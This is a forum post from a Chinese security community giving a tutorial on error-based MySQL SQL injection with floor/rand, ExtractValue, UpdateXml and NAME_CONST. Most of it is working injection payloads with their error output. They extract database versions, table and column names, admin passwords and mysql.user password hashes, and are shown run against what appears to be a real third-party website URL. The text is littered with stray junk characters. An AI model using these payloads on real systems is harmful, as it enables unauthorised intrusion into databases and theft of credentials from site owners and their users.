找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3103|回复: 0
打印 上一主题 下一主题

mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2015-11-11 19:03:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

举例如下:
6 D& e7 t" W1 I  c6 [# X首先进行正常查询:

mysql> select * from article where id = 1;8 Z& |! c. P( p' w- l1 F
+—-+——-+———+
- J7 @- Z4 @$ b| id | title | content |) f# L/ z! M0 I
+—-+——-+———+6 n5 t! q6 H) J( \0 B8 w* L; R. w
|  1 | test  | do it   |
: H5 `  ^0 O$ C) }+ F+—-+——-+———+

假如id输入存在注入的话,可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);
; q6 Y7 Z' _9 E# x) F. XERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’

可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。3 n7 r- q" O; o- `$ M
例如我们需要查询管理员用户名和密码:

Method1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);" U3 }; W, v# X0 U8 x: h
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*)  from (select 1 union   select null union   select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2)));
- n" i# }8 L# @ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

2、ExtractValue; ?+ p# [8 R" L, T6 s. s3 l
测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–' K5 @' Z; e; {6 e" Z
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′

3、UpdateXml

测试语句

and 1=(updatexml(1,concat(0x3a,(select user())),1))

实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’

! e$ f" O+ N( a! m

7 b; B5 P3 W: f1 X

再收集:


; l4 }  \/ r2 k# q" e5 e4 ?1 m& Shttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) ) S3 f5 Q. `# l3 p: U7 [

2 I! ~- S# R1 q5 g5 s8 jErroruplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’/ D3 q/ h1 t8 Q3 c: L# o# A6 S. i
2 M6 p  Z7 Y+ V; S9 C5 J5 W* Z/ g
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)7 ]- l( |, n8 Y0 r( R0 Q7 m# W

- \9 f. G& F, W+ d) fErroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ $ l% g$ x7 [$ d" k# T5 V
- e& ?( j9 W/ p/ ~4 ^6 t  m
MYSQL高版本报错注入技巧-利用NAME_CONST注入
: i0 u6 Y3 w6 e% s/ sIt's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
* J2 |8 V; s5 f' f
9 i; X4 Z1 p9 a# n+ _4 b% }, W/ ?( i. D1 ?: m  U) h" v4 S2 x
相关信息
7 j( q3 |9 ~' h" _1 E0 Z* A/ d
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.9 ~5 Z8 x% _  y. S" A
' h8 ~7 v- _. H
Code:: _$ w/ D% B- b( j) B, [4 [
NAME_CONST(DATA, VALUE)
- d4 G: |$ h8 `& Q6 F+ g) |3 c2 Y- X' M( H1 r7 U
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
9 A* I/ @' N: m: N. A9 J6 A2 i4 V6 O8 S
SELECT NAME_CONST('TEST', 1)
9 j" T# U7 H9 G( Z; S; X
# C% h$ f8 h1 N8 W+ z* O
& H1 f1 \# {8 }  e4 Z$ ?2 y# L6 h
$ b# O' @: r. }: e7 s|---------------|' \0 a, k& D1 j+ ]5 u
|     TEST      |4 a5 v: k7 W& t* t: v; d, l9 D- F
|               |8 [( M8 ~" J, l* e% r  K5 t0 {
|---------------|5 v3 P% k! [3 Y4 I- x
|       1       |
% B/ X/ d& e2 J; T2 Y5 U|               |8 [0 F6 U" u+ c% ~6 z9 r3 |
|---------------|
! c! ], d7 \0 ]: w$ W6 S
' `1 Y3 Q0 H, Y( v6 l* D1 A1 D/ X- S1 G+ p! P

7 _6 Q0 Z- a; g' s3 E9 _. }" o0 A1 o* q* ?9 o# W. r$ d/ X8 j

" ^. z  V% k6 Z8 B! dhttp://dev.mysql.com/doc/refman/5.0/en/m...name-const) M4 [5 @, g5 Z# k7 a  O
Intro to MySQL Variables
! B- J) C: X8 l" G0 |5 q+ v' z
: J& C/ \! D4 |  jOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
% z, z: u2 R9 B
: ~# z' a- U8 f2 E+ ]Code:$ a- K$ o4 x/ v7 m: _1 @
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
  m- S0 _. e, H) x! c
1 w; e/ ?+ m' Y8 N  B
; d  l$ ]( a- P  U# ^) h
# _! J+ T% ^; f! J# _" D& q+ ^
+ y3 J9 X2 F8 V
; a2 Q" |  K0 Y, Q5 t# }7 z6 l# ?$ h
Code:' m9 x( h. n, f: s& U% l) g+ ]
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
- P! c% l. v! h, v% m6 b  Y

* ?4 V) R% O+ P; i! S( O$ m' M+ m6 k. M) Z) |$ m/ N# G
VAR = Your MySQL variable.+ k( Q& P. O4 m8 C) L5 |

" V# |  w& t; T+ {( JMySQL 5.1.3 Server System Variables
: [& U6 u8 X/ \+ J0 K: N9 d2 `
& f* X, T2 R' w$ R7 z  O  L2 uLet's try it out on my site..0 f+ A" n; l: T! f0 ]
* Y8 F3 J3 J) Z3 n# g9 \. D" ]' U
Code:, D+ M) S; G) a) e
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--* V) w+ c1 v9 Y9 M; `2 Z
7 o  y9 ~: K1 d% l
Erroruplicate column name '5.0.27-community-nt'! B# L# x6 f5 `* V
% F- ?1 ?$ U, i% r4 `2 {2 L) y

  b8 O& K, [- A  o% o; [8 K% X& B8 _( _3 l7 C8 Y4 d. o/ t  u
) x. t% A3 I8 `. r4 ~' U

2 |* [8 |* e( T3 v3 j8 uNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
' [& W" E, _2 g9 n$ s/ R: |# `7 P8 W" W, b+ b* ]/ k
Data Extraction
* F8 m0 `; V; E+ R  U3 X6 d: v! P2 n0 M. U$ c, T! _
Code:  y! t& O( `* ^9 X" R. q  g) \6 N& v" u
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--- p; J& t' q1 O8 J& ]; f
* Q3 Y" V, ]4 g/ _& N: \6 t

% I- w1 N; h6 O: e  k4 lWe should get a duplicate column 1 error.... B  m! \% U2 S* Y7 C$ ^. |7 A' P
5 ^. y" S. U- c7 B! t; R7 B
Code:( Y% n7 S8 d, m4 C7 t
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--- i3 a: q7 C0 C# W4 \1 a7 B' y
7 Y4 n" G" S  Y6 ~/ L
Erroruplicate column name '1. \- S1 Z* F6 y1 v
7 C+ h2 R4 e: j5 F

* b% j  R# Q  Z- H& }
% F0 m- R9 G9 D0 }
5 p, ~8 M: m# W

% `" k9 n7 ?# `
/ p0 U  B' Q9 w3 ?Now let's get the tables out this bitch..0 l. @4 N8 T* q
7 L5 e( h# m0 D3 I' }; s
Code:
; y: T: E2 c, U+ f+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
" |$ `7 B* g$ d0 G5 ~  N

7 |8 U0 r+ ^$ j9 Z* }
7 D  z/ D7 d7 B/ X% sLet's see if it works here, if it does, we can go on and finish the job.
7 Z, t' c4 c" ~: h! s
5 ]. k; M2 b; {& j/ E! F! `Code:
' W7 j- x5 ~4 V" ^http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
: L. ]+ V" E& D0 T# r
$ D( g5 H! Y. {1 k  z) j3 a$ r( y4 _7 |, [+ h
Erroruplicate column name 'com_admanage
, _7 ~7 q7 ]( t# ^

& M% @- e0 C. |, k3 C
0 }8 N# O/ Y0 l8 {8 e1 Y1 G% f( {  B" j+ F% I+ Q1 D

% U# N5 m: z2 [) ~, W; H3 I! h1 l! e
- ]  g" _  S$ f  W

+ Z$ q* J5 T. M& `: iNow I'm going to be lazy and use mysql.user as an example, just for the sake of time.$ x. I; c; }: h2 X
7 ~9 ~" b5 ^* z0 v; y# B: X$ V* ], D
Let's get the columns out of the user table..; A) }$ S& K' }6 Q: w' i
  D% k6 ~7 ^. o
Code:; c* y; u- C; @7 c
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
6 x, W% p8 f! f" B0 P1 X3 g

' K% T; [2 N* a
5 s4 H! {3 }+ y; _So mine looks like this, and I get the duplicate column name 'Host'./ ~' _9 A" Y& o" J7 T; F
/ N! m) \/ s* z3 T. Z( B2 Z
Code:5 r7 }0 F4 ~. _$ d4 I& S5 n
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
3 h# z% I4 P+ L  @& Z3 M
8 o. z! o* f& u1 n) qErroruplicate column name 'Host'. y7 X6 \$ k& f) C) l2 H/ l

1 c$ B7 R4 \+ U7 s4 G) I: {# V" ?( u* V

5 m: E; V# a! Q* {# X0 O+ z$ c* `0 a+ n* u
) L- F$ I6 {! w. W4 Q: S7 s, r

- W" V1 t- C+ ]& h) GWoot, time to finish this bitch off.8 B$ l% s: c1 A# q6 h

8 A, @4 J, S2 V# g6 lCode:
3 N$ o8 l: T4 }  v+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--3 J( \( E' }9 x" J
; R" q/ b* b" M* C2 N( g" ~& q5 `
- p5 L- _' X0 L4 `7 w. u
So mine looks like this...( e  w+ d8 Z5 ~2 K4 S
  H# M2 e6 r& }8 P
Code:3 y* t- Y, q+ D$ E& `- o( }: n% W
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
$ G: \0 i  S2 }& O) H7 A8 `9 Q
( U5 O7 ^. D2 F0 UErroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
" _: l' l. _4 P9 A/ P
! b4 L0 p) L9 I7 }+ j( t' ~9 P) K
4 N' _; ]. \8 Z! n
. A( r& p# m2 h! k. o8 P+ o* y
- u, O: e) N, o

! u: x* t: G  H  Q; S# ^& Q9 X# J/ w" S
And there we have it, thanks for reading.
( z  L* a- q& X+ @
; L' D9 ?; |2 G' d' F" A
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表